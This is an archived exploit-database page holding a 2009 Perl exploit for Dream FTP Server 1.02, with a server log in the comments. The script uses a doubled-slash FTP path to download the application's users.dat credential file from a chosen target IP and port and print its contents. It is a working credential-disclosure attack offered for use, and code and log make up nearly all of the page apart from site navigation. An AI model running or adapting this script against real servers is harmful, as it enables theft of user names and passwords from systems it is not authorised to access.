what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dream FTP Server 1.02 File Disclosure

Dream FTP Server 1.02 File Disclosure
Posted Apr 23, 2009
Authored by Cyber-Zone | Site iq-ty.com

Dream FTP Server version 1.02 arbitrary file disclosure exploit.

tags | exploit, arbitrary, info disclosure
SHA-256 | 0a8957195a3363af5c1edcabe501ca7bd442206772ab0135e9d2a2c33db8d767

Dream FTP Server 1.02 File Disclosure

Change Mirror Download
#!/usr/bin/perl -w
#
# This Bug Similar to others found By My Friend : Stack <= so special Thanx
# So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
# But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat
# In This Exploit I Used The Port 80 You can use any port you want 21
#################################################################################################################################
#23/04/2009 13:20:25 FTP Server started on port 80.
#23/04/2009 13:25:43 [0000000002] Client connected from 127.0.0.1.
#23/04/2009 13:25:43 [0000000002] 220- ****************************************
#23/04/2009 13:25:43 [0000000002] 220-
#23/04/2009 13:25:43 [0000000002] 220- Welcome to Dream FTP Server
#23/04/2009 13:25:43 [0000000002] 220- Copyright 2002 - 2004
#23/04/2009 13:25:43 [0000000002] 220- BolinTech Inc.
#23/04/2009 13:25:43 [0000000002] 220-
#23/04/2009 13:25:43 [0000000002] 220- ****************************************
#23/04/2009 13:25:43 [0000000002] 220-
#23/04/2009 13:25:43 [0000000002] 220
#23/04/2009 13:25:43 [0000000002] USER anonymous
#23/04/2009 13:25:43 [0000000002] 331 Password required for anonymous
#23/04/2009 13:25:43 [0000000002] PASS **********
#23/04/2009 13:25:43 [0000000002] 230 User successfully logged in.
#23/04/2009 13:25:43 [0000000002] PWD
#23/04/2009 13:25:43 [0000000002] 257 "/" is current directory.
#23/04/2009 13:25:43 [0000000002] TYPE I
#23/04/2009 13:25:43 [0000000002] 200 Type set to I
#23/04/2009 13:25:43 [0000000002] CWD Program Files
#23/04/2009 13:25:43 [0000000002] 250 "/Program Files" is current directory.
#23/04/2009 13:25:43 [0000000002] CWD BolinTech
#23/04/2009 13:25:43 [0000000002] 250 "/Program Files/BolinTech" is current directory.
#23/04/2009 13:25:43 [0000000002] MDTM users.dat
#23/04/2009 13:25:43 [0000000002] 502 Command not implemented - Try HELP.
#23/04/2009 13:25:43 [0000000002] PASV
#23/04/2009 13:25:43 [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
#23/04/2009 13:25:43 [0000000002] RETR users.dat
#23/04/2009 13:25:43 [0000000002] 150 Opening BINARY mode data connection for file transfer.
#23/04/2009 13:25:43 [0000000002] 226 Transfer complete
#23/04/2009 13:25:43 [0000000002] Client disconnected from 127.0.0.1.
#################################################################################################################################
# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
#################################################################################################################################
# welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
#################################################################################################################################
# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
#################################################################################################################################
use LWP::Simple;
use LWP::UserAgent;

print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 3)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port \n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";
}
($HackerName, $TargetIP, $AttackedPort) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print(" ******************************\n");
print(" * Status *\n");
print(" ******************************\n");
print("$HackerName , AttaCking The Target : $TargetIP \n");
print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
$terget1="Program Files";
$target2="BolinTech";
$target3="users.dat";
$slash="/";
$TargetFile=$terget1.$slash.$target2.$slash.$target3;
$temp="/" x 2;
my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....> |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close